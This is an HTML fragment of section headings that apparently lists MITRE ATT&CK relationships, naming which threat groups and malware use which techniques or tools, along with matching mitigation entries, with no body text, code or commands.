<h3 id="_bronze_butler_g0060_uses_bypass_user_account_control_t1088"><a class="anchor" href="#_bronze_butler_g0060_uses_bypass_user_account_control_t1088"></a><a class="link" href="#_bronze_butler_g0060_uses_bypass_user_account_control_t1088">BRONZE BUTLER (G0060) uses Bypass User Account Control (T1088)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_psexec_s0029"><a class="anchor" href="#_menupass_g0045_uses_psexec_s0029"></a><a class="link" href="#_menupass_g0045_uses_psexec_s0029">menuPass (G0045) uses PsExec (S0029)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_komprogo_s0156"><a class="anchor" href="#_apt32_g0050_uses_komprogo_s0156"></a><a class="link" href="#_apt32_g0050_uses_komprogo_s0156">APT32 (G0050) uses KOMPROGO (S0156)</a></h3>
</div>
<div class="sect2">
<h3 id="_tinytyphon_s0131_uses_automated_exfiltration_t1020"><a class="anchor" href="#_tinytyphon_s0131_uses_automated_exfiltration_t1020"></a><a class="link" href="#_tinytyphon_s0131_uses_automated_exfiltration_t1020">TINYTYPHON (S0131) uses Automated Exfiltration (T1020)</a></h3>
</div>
<div class="sect2">
<h3 id="_hidedrv_s0135_uses_process_injection_t1055"><a class="anchor" href="#_hidedrv_s0135_uses_process_injection_t1055"></a><a class="link" href="#_hidedrv_s0135_uses_process_injection_t1055">HIDEDRV (S0135) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_account_discovery_t1087"><a class="anchor" href="#_ke3chang_g0004_uses_account_discovery_t1087"></a><a class="link" href="#_ke3chang_g0004_uses_account_discovery_t1087">Ke3chang (G0004) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_query_registry_t1012"><a class="anchor" href="#_lazarus_group_g0032_uses_query_registry_t1012"></a><a class="link" href="#_lazarus_group_g0032_uses_query_registry_t1012">Lazarus Group (G0032) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_flame_s0143_uses_rundll32_t1085"><a class="anchor" href="#_flame_s0143_uses_rundll32_t1085"></a><a class="link" href="#_flame_s0143_uses_rundll32_t1085">Flame (S0143) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_data_from_local_system_t1005"><a class="anchor" href="#_bronze_butler_g0060_uses_data_from_local_system_t1005"></a><a class="link" href="#_bronze_butler_g0060_uses_data_from_local_system_t1005">BRONZE BUTLER (G0060) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_sakula_s0074_uses_new_service_t1050"><a class="anchor" href="#_sakula_s0074_uses_new_service_t1050"></a><a class="link" href="#_sakula_s0074_uses_new_service_t1050">Sakula (S0074) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_patchwork_g0040_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_patchwork_g0040_uses_file_and_directory_discovery_t1083">Patchwork (G0040) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_winlogon_helper_dll_mitigation_t1004_mitigates_winlogon_helper_dll_t1004"><a class="anchor" href="#_winlogon_helper_dll_mitigation_t1004_mitigates_winlogon_helper_dll_t1004"></a><a class="link" href="#_winlogon_helper_dll_mitigation_t1004_mitigates_winlogon_helper_dll_t1004">Winlogon Helper DLL Mitigation (T1004) mitigates Winlogon Helper DLL (T1004)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_process_hollowing_t1093"><a class="anchor" href="#_badnews_s0128_uses_process_hollowing_t1093"></a><a class="link" href="#_badnews_s0128_uses_process_hollowing_t1093">BADNEWS (S0128) uses Process Hollowing (T1093)</a></h3>
</div>
<div class="sect2">
<h3 id="_janicab_s0163_uses_local_job_scheduling_t1168"><a class="anchor" href="#_janicab_s0163_uses_local_job_scheduling_t1168"></a><a class="link" href="#_janicab_s0163_uses_local_job_scheduling_t1168">Janicab (S0163) uses Local Job Scheduling (T1168)</a></h3>
</div>
<div class="sect2">
<h3 id="_sslmm_s0058_uses_disabling_security_tools_t1089"><a class="anchor" href="#_sslmm_s0058_uses_disabling_security_tools_t1089"></a><a class="link" href="#_sslmm_s0058_uses_disabling_security_tools_t1089">SslMM (S0058) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_change_default_file_association_mitigation_t1042_mitigates_change_default_file_association_t1042"><a class="anchor" href="#_change_default_file_association_mitigation_t1042_mitigates_change_default_file_association_t1042"></a><a class="link" href="#_change_default_file_association_mitigation_t1042_mitigates_change_default_file_association_t1042">Change Default File Association Mitigation (T1042) mitigates Change Default File Association (T1042)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_account_discovery_t1087"><a class="anchor" href="#_fin6_g0037_uses_account_discovery_t1087"></a><a class="link" href="#_fin6_g0037_uses_account_discovery_t1087">FIN6 (G0037) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_command_line_interface_t1059"><a class="anchor" href="#_admin_338_g0018_uses_command_line_interface_t1059"></a><a class="link" href="#_admin_338_g0018_uses_command_line_interface_t1059">admin@338 (G0018) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_peripheral_device_discovery_t1120"><a class="anchor" href="#_rtm_s0148_uses_peripheral_device_discovery_t1120"></a><a class="link" href="#_rtm_s0148_uses_peripheral_device_discovery_t1120">RTM (S0148) uses Peripheral Device Discovery (T1120)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_commonly_used_port_t1043"><a class="anchor" href="#_apt3_g0022_uses_commonly_used_port_t1043"></a><a class="link" href="#_apt3_g0022_uses_commonly_used_port_t1043">APT3 (G0022) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_net_s0039"><a class="anchor" href="#_threat_group_3390_g0027_uses_net_s0039"></a><a class="link" href="#_threat_group_3390_g0027_uses_net_s0039">Threat Group-3390 (G0027) uses Net (S0039)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_cosmicduke_s0050_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_cosmicduke_s0050_uses_file_and_directory_discovery_t1083">CosmicDuke (S0050) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_account_discovery_t1087"><a class="anchor" href="#_oilrig_g0049_uses_account_discovery_t1087"></a><a class="link" href="#_oilrig_g0049_uses_account_discovery_t1087">OilRig (G0049) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_indicator_removal_from_tools_t1066"><a class="anchor" href="#_cobalt_strike_s0154_uses_indicator_removal_from_tools_t1066"></a><a class="link" href="#_cobalt_strike_s0154_uses_indicator_removal_from_tools_t1066">Cobalt Strike (S0154) uses Indicator Removal from Tools (T1066)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_command_line_interface_t1059"><a class="anchor" href="#_cobalt_strike_s0154_uses_command_line_interface_t1059"></a><a class="link" href="#_cobalt_strike_s0154_uses_command_line_interface_t1059">Cobalt Strike (S0154) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_phoreal_s0158_uses_modify_registry_t1112"><a class="anchor" href="#_phoreal_s0158_uses_modify_registry_t1112"></a><a class="link" href="#_phoreal_s0158_uses_modify_registry_t1112">PHOREAL (S0158) uses Modify Registry (T1112)</a></h3>
</div>
<div class="sect2">
<h3 id="_pinchduke_s0048_uses_credential_dumping_t1003"><a class="anchor" href="#_pinchduke_s0048_uses_credential_dumping_t1003"></a><a class="link" href="#_pinchduke_s0048_uses_credential_dumping_t1003">PinchDuke (S0048) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_data_encrypted_t1022"><a class="anchor" href="#_threat_group_3390_g0027_uses_data_encrypted_t1022"></a><a class="link" href="#_threat_group_3390_g0027_uses_data_encrypted_t1022">Threat Group-3390 (G0027) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_xagentosx_s0161"><a class="anchor" href="#_apt28_g0007_uses_xagentosx_s0161"></a><a class="link" href="#_apt28_g0007_uses_xagentosx_s0161">APT28 (G0007) uses XAgentOSX (S0161)</a></h3>
</div>
<div class="sect2">
<h3 id="_account_discovery_mitigation_t1087_mitigates_account_discovery_t1087"><a class="anchor" href="#_account_discovery_mitigation_t1087_mitigates_account_discovery_t1087"></a><a class="link" href="#_account_discovery_mitigation_t1087_mitigates_account_discovery_t1087">Account Discovery Mitigation (T1087) mitigates Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_backdoor_oldrea_s0093_uses_process_injection_t1055"><a class="anchor" href="#_backdoor_oldrea_s0093_uses_process_injection_t1055"></a><a class="link" href="#_backdoor_oldrea_s0093_uses_process_injection_t1055">Backdoor.Oldrea (S0093) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_copykittens_g0052_uses_cobalt_strike_s0154"><a class="anchor" href="#_copykittens_g0052_uses_cobalt_strike_s0154"></a><a class="link" href="#_copykittens_g0052_uses_cobalt_strike_s0154">CopyKittens (G0052) uses Cobalt Strike (S0154)</a></h3>
</div>
<div class="sect2">
<h3 id="_shipshape_s0028_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_shipshape_s0028_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_shipshape_s0028_uses_registry_run_keys_start_folder_t1060">SHIPSHAPE (S0028) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_winmm_s0059_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_winmm_s0059_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_winmm_s0059_uses_standard_application_layer_protocol_t1071">WinMM (S0059) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_bbsrat_s0127_uses_system_service_discovery_t1007"><a class="anchor" href="#_bbsrat_s0127_uses_system_service_discovery_t1007"></a><a class="link" href="#_bbsrat_s0127_uses_system_service_discovery_t1007">BBSRAT (S0127) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_copykittens_g0052_uses_data_compressed_t1002"><a class="anchor" href="#_copykittens_g0052_uses_data_compressed_t1002"></a><a class="link" href="#_copykittens_g0052_uses_data_compressed_t1002">CopyKittens (G0052) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_scripting_mitigation_t1064_mitigates_scripting_t1064"><a class="anchor" href="#_scripting_mitigation_t1064_mitigates_scripting_t1064"></a><a class="link" href="#_scripting_mitigation_t1064_mitigates_scripting_t1064">Scripting Mitigation (T1064) mitigates Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_felismus_s0171_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_felismus_s0171_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_felismus_s0171_uses_standard_cryptographic_protocol_t1032">Felismus (S0171) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_gazer_s0168_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_gazer_s0168_uses_custom_cryptographic_protocol_t1024">Gazer (S0168) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_system_service_discovery_t1007"><a class="anchor" href="#_turla_g0010_uses_system_service_discovery_t1007"></a><a class="link" href="#_turla_g0010_uses_system_service_discovery_t1007">Turla (G0010) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_pisloader_s0124_uses_data_encoding_t1132"><a class="anchor" href="#_pisloader_s0124_uses_data_encoding_t1132"></a><a class="link" href="#_pisloader_s0124_uses_data_encoding_t1132">Pisloader (S0124) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_hikit_s0009_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_hikit_s0009_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_hikit_s0009_uses_custom_cryptographic_protocol_t1024">Hikit (S0009) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_indicator_removal_on_host_t1070"><a class="anchor" href="#_apt28_g0007_uses_indicator_removal_on_host_t1070"></a><a class="link" href="#_apt28_g0007_uses_indicator_removal_on_host_t1070">APT28 (G0007) uses Indicator Removal on Host (T1070)</a></h3>
</div>
<div class="sect2">
<h3 id="_rover_s0090_uses_input_capture_t1056"><a class="anchor" href="#_rover_s0090_uses_input_capture_t1056"></a><a class="link" href="#_rover_s0090_uses_input_capture_t1056">Rover (S0090) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_dll_search_order_hijacking_t1038"><a class="anchor" href="#_menupass_g0045_uses_dll_search_order_hijacking_t1038"></a><a class="link" href="#_menupass_g0045_uses_dll_search_order_hijacking_t1038">menuPass (G0045) uses DLL Search Order Hijacking (T1038)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_mimikatz_s0002"><a class="anchor" href="#_apt32_g0050_uses_mimikatz_s0002"></a><a class="link" href="#_apt32_g0050_uses_mimikatz_s0002">APT32 (G0050) uses Mimikatz (S0002)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_helminth_s0170_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_helminth_s0170_uses_obfuscated_files_or_information_t1027">Helminth (S0170) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_custom_command_and_control_protocol_t1094"><a class="anchor" href="#_oilrig_g0049_uses_custom_command_and_control_protocol_t1094"></a><a class="link" href="#_oilrig_g0049_uses_custom_command_and_control_protocol_t1094">OilRig (G0049) uses Custom Command and Control Protocol (T1094)</a></h3>
</div>
<div class="sect2">
<h3 id="_monsoon_g0042_uses_unknown_logger_s0130"><a class="anchor" href="#_monsoon_g0042_uses_unknown_logger_s0130"></a><a class="link" href="#_monsoon_g0042_uses_unknown_logger_s0130">MONSOON (G0042) uses Unknown Logger (S0130)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_application_deployment_software_t1017"><a class="anchor" href="#_apt32_g0050_uses_application_deployment_software_t1017"></a><a class="link" href="#_apt32_g0050_uses_application_deployment_software_t1017">APT32 (G0050) uses Application Deployment Software (T1017)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_cozycar_s0046"><a class="anchor" href="#_apt29_g0016_uses_cozycar_s0046"></a><a class="link" href="#_apt29_g0016_uses_cozycar_s0046">APT29 (G0016) uses CozyCar (S0046)</a></h3>
</div>
<div class="sect2">
<h3 id="_trusted_developer_utilities_mitigation_t1127_mitigates_trusted_developer_utilities_t1127"><a class="anchor" href="#_trusted_developer_utilities_mitigation_t1127_mitigates_trusted_developer_utilities_t1127"></a><a class="link" href="#_trusted_developer_utilities_mitigation_t1127_mitigates_trusted_developer_utilities_t1127">Trusted Developer Utilities Mitigation (T1127) mitigates Trusted Developer Utilities (T1127)</a></h3>
</div>
<div class="sect2">
<h3 id="_sakula_s0074_uses_command_line_interface_t1059"><a class="anchor" href="#_sakula_s0074_uses_command_line_interface_t1059"></a><a class="link" href="#_sakula_s0074_uses_command_line_interface_t1059">Sakula (S0074) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003_uses_mimikatz_s0002"><a class="anchor" href="#_cleaver_g0003_uses_mimikatz_s0002"></a><a class="link" href="#_cleaver_g0003_uses_mimikatz_s0002">Cleaver (G0003) uses Mimikatz (S0002)</a></h3>
</div>
<div class="sect2">
<h3 id="_flame_s0143_uses_authentication_package_t1131"><a class="anchor" href="#_flame_s0143_uses_authentication_package_t1131"></a><a class="link" href="#_flame_s0143_uses_authentication_package_t1131">Flame (S0143) uses Authentication Package (T1131)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_remote_file_copy_t1105"><a class="anchor" href="#_gazer_s0168_uses_remote_file_copy_t1105"></a><a class="link" href="#_gazer_s0168_uses_remote_file_copy_t1105">Gazer (S0168) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_process_discovery_t1057"><a class="anchor" href="#_apt3_g0022_uses_process_discovery_t1057"></a><a class="link" href="#_apt3_g0022_uses_process_discovery_t1057">APT3 (G0022) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_security_software_discovery_t1063"><a class="anchor" href="#_patchwork_g0040_uses_security_software_discovery_t1063"></a><a class="link" href="#_patchwork_g0040_uses_security_software_discovery_t1063">Patchwork (G0040) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_kasidet_s0088_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_kasidet_s0088_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_kasidet_s0088_uses_file_and_directory_discovery_t1083">Kasidet (S0088) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_appinit_dlls_mitigation_t1103_mitigates_appinit_dlls_t1103"><a class="anchor" href="#_appinit_dlls_mitigation_t1103_mitigates_appinit_dlls_t1103"></a><a class="link" href="#_appinit_dlls_mitigation_t1103_mitigates_appinit_dlls_t1103">AppInit DLLs Mitigation (T1103) mitigates AppInit DLLs (T1103)</a></h3>
</div>
<div class="sect2">
<h3 id="_network_sniffing_mitigation_t1040_mitigates_network_sniffing_t1040"><a class="anchor" href="#_network_sniffing_mitigation_t1040_mitigates_network_sniffing_t1040"></a><a class="link" href="#_network_sniffing_mitigation_t1040_mitigates_network_sniffing_t1040">Network Sniffing Mitigation (T1040) mitigates Network Sniffing (T1040)</a></h3>
</div>
<div class="sect2">
<h3 id="_chches_s0144_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_chches_s0144_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_chches_s0144_uses_standard_application_layer_protocol_t1071">ChChes (S0144) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_remote_file_copy_t1105"><a class="anchor" href="#_rtm_s0148_uses_remote_file_copy_t1105"></a><a class="link" href="#_rtm_s0148_uses_remote_file_copy_t1105">RTM (S0148) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_data_from_local_system_mitigation_t1005_mitigates_data_from_local_system_t1005"><a class="anchor" href="#_data_from_local_system_mitigation_t1005_mitigates_data_from_local_system_t1005"></a><a class="link" href="#_data_from_local_system_mitigation_t1005_mitigates_data_from_local_system_t1005">Data from Local System Mitigation (T1005) mitigates Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_mis_type_s0084_uses_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_mis_type_s0084_uses_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_mis_type_s0084_uses_standard_non_application_layer_protocol_t1095">Mis-Type (S0084) uses Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
<h3 id="_powersource_s0145_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_powersource_s0145_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_powersource_s0145_uses_standard_application_layer_protocol_t1071">POWERSOURCE (S0145) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_arp_s0099_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_arp_s0099_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_arp_s0099_uses_system_network_configuration_discovery_t1016">Arp (S0099) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_miniduke_s0051_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_miniduke_s0051_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_miniduke_s0051_uses_standard_application_layer_protocol_t1071">MiniDuke (S0051) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_net_s0039_uses_system_service_discovery_t1007"><a class="anchor" href="#_net_s0039_uses_system_service_discovery_t1007"></a><a class="link" href="#_net_s0039_uses_system_service_discovery_t1007">Net (S0039) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_misdat_s0083_uses_system_information_discovery_t1082"><a class="anchor" href="#_misdat_s0083_uses_system_information_discovery_t1082"></a><a class="link" href="#_misdat_s0083_uses_system_information_discovery_t1082">Misdat (S0083) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_s_type_s0085_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_s_type_s0085_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_s_type_s0085_uses_registry_run_keys_start_folder_t1060">S-Type (S0085) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_startup_items_mitigation_t1165_mitigates_startup_items_t1165"><a class="anchor" href="#_startup_items_mitigation_t1165_mitigates_startup_items_t1165"></a><a class="link" href="#_startup_items_mitigation_t1165_mitigates_startup_items_t1165">Startup Items Mitigation (T1165) mitigates Startup Items (T1165)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_query_registry_t1012"><a class="anchor" href="#_turla_g0010_uses_query_registry_t1012"></a><a class="link" href="#_turla_g0010_uses_query_registry_t1012">Turla (G0010) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_oilrig_g0049_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_oilrig_g0049_uses_system_network_configuration_discovery_t1016">OilRig (G0049) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_axiom_g0001_uses_data_obfuscation_t1001"><a class="anchor" href="#_axiom_g0001_uses_data_obfuscation_t1001"></a><a class="link" href="#_axiom_g0001_uses_data_obfuscation_t1001">Axiom (G0001) uses Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_commonly_used_port_t1043"><a class="anchor" href="#_redleaves_s0153_uses_commonly_used_port_t1043"></a><a class="link" href="#_redleaves_s0153_uses_commonly_used_port_t1043">RedLeaves (S0153) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_file_deletion_t1107"><a class="anchor" href="#_magic_hound_g0059_uses_file_deletion_t1107"></a><a class="link" href="#_magic_hound_g0059_uses_file_deletion_t1107">Magic Hound (G0059) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_process_hollowing_mitigation_t1093_mitigates_process_hollowing_t1093"><a class="anchor" href="#_process_hollowing_mitigation_t1093_mitigates_process_hollowing_t1093"></a><a class="link" href="#_process_hollowing_mitigation_t1093_mitigates_process_hollowing_t1093">Process Hollowing Mitigation (T1093) mitigates Process Hollowing (T1093)</a></h3>
</div>
<div class="sect2">
<h3 id="_network_share_discovery_mitigation_t1135_mitigates_network_share_discovery_t1135"><a class="anchor" href="#_network_share_discovery_mitigation_t1135_mitigates_network_share_discovery_t1135"></a><a class="link" href="#_network_share_discovery_mitigation_t1135_mitigates_network_share_discovery_t1135">Network Share Discovery Mitigation (T1135) mitigates Network Share Discovery (T1135)</a></h3>
</div>
<div class="sect2">
<h3 id="_sslmm_s0058_uses_masquerading_t1036"><a class="anchor" href="#_sslmm_s0058_uses_masquerading_t1036"></a><a class="link" href="#_sslmm_s0058_uses_masquerading_t1036">SslMM (S0058) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_file_system_permissions_weakness_mitigation_t1044_mitigates_file_system_permissions_weakness_t1044"><a class="anchor" href="#_file_system_permissions_weakness_mitigation_t1044_mitigates_file_system_permissions_weakness_t1044"></a><a class="link" href="#_file_system_permissions_weakness_mitigation_t1044_mitigates_file_system_permissions_weakness_t1044">File System Permissions Weakness Mitigation (T1044) mitigates File System Permissions Weakness (T1044)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_remote_file_copy_t1105"><a class="anchor" href="#_menupass_g0045_uses_remote_file_copy_t1105"></a><a class="link" href="#_menupass_g0045_uses_remote_file_copy_t1105">menuPass (G0045) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_mivast_s0080_uses_command_line_interface_t1059"><a class="anchor" href="#_mivast_s0080_uses_command_line_interface_t1059"></a><a class="link" href="#_mivast_s0080_uses_command_line_interface_t1059">Mivast (S0080) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_scripting_t1064"><a class="anchor" href="#_apt29_g0016_uses_scripting_t1064"></a><a class="link" href="#_apt29_g0016_uses_scripting_t1064">APT29 (G0016) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_account_manipulation_t1098"><a class="anchor" href="#_lazarus_group_g0032_uses_account_manipulation_t1098"></a><a class="link" href="#_lazarus_group_g0032_uses_account_manipulation_t1098">Lazarus Group (G0032) uses Account Manipulation (T1098)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_data_compressed_t1002"><a class="anchor" href="#_apt1_g0006_uses_data_compressed_t1002"></a><a class="link" href="#_apt1_g0006_uses_data_compressed_t1002">APT1 (G0006) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_accessibility_features_t1015"><a class="anchor" href="#_apt29_g0016_uses_accessibility_features_t1015"></a><a class="link" href="#_apt29_g0016_uses_accessibility_features_t1015">APT29 (G0016) uses Accessibility Features (T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_tdtess_s0164_uses_timestomp_t1099"><a class="anchor" href="#_tdtess_s0164_uses_timestomp_t1099"></a><a class="link" href="#_tdtess_s0164_uses_timestomp_t1099">TDTESS (S0164) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt12_g0005_uses_ixeshe_s0015"><a class="anchor" href="#_apt12_g0005_uses_ixeshe_s0015"></a><a class="link" href="#_apt12_g0005_uses_ixeshe_s0015">APT12 (G0005) uses Ixeshe (S0015)</a></h3>
</div>
<div class="sect2">
<h3 id="_streamex_s0142_uses_modify_registry_t1112"><a class="anchor" href="#_streamex_s0142_uses_modify_registry_t1112"></a><a class="link" href="#_streamex_s0142_uses_modify_registry_t1112">StreamEx (S0142) uses Modify Registry (T1112)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_redleaves_s0153_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_redleaves_s0153_uses_registry_run_keys_start_folder_t1060">RedLeaves (S0153) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_emissary_s0082_uses_system_information_discovery_t1082"><a class="anchor" href="#_emissary_s0082_uses_system_information_discovery_t1082"></a><a class="link" href="#_emissary_s0082_uses_system_information_discovery_t1082">Emissary (S0082) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_reaver_s0172_uses_system_information_discovery_t1082"><a class="anchor" href="#_reaver_s0172_uses_system_information_discovery_t1082"></a><a class="link" href="#_reaver_s0172_uses_system_information_discovery_t1082">Reaver (S0172) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_xtunnel_s0117_uses_credentials_in_files_t1081"><a class="anchor" href="#_xtunnel_s0117_uses_credentials_in_files_t1081"></a><a class="link" href="#_xtunnel_s0117_uses_credentials_in_files_t1081">XTunnel (S0117) uses Credentials in Files (T1081)</a></h3>
</div>
<div class="sect2">
<h3 id="_finfisher_s0182_uses_hooking_t1179"><a class="anchor" href="#_finfisher_s0182_uses_hooking_t1179"></a><a class="link" href="#_finfisher_s0182_uses_hooking_t1179">FinFisher (S0182) uses Hooking (T1179)</a></h3>
</div>
<div class="sect2">
<h3 id="_standard_application_layer_protocol_mitigation_t1071_mitigates_standard_application_layer_protocol_t1071"><a class="anchor" href="#_standard_application_layer_protocol_mitigation_t1071_mitigates_standard_application_layer_protocol_t1071"></a><a class="link" href="#_standard_application_layer_protocol_mitigation_t1071_mitigates_standard_application_layer_protocol_t1071">Standard Application Layer Protocol Mitigation (T1071) mitigates Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_mobileorder_s0079_uses_data_from_local_system_t1005"><a class="anchor" href="#_mobileorder_s0079_uses_data_from_local_system_t1005"></a><a class="link" href="#_mobileorder_s0079_uses_data_from_local_system_t1005">MobileOrder (S0079) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_apt32_g0050_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_apt32_g0050_uses_standard_application_layer_protocol_t1071">APT32 (G0050) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
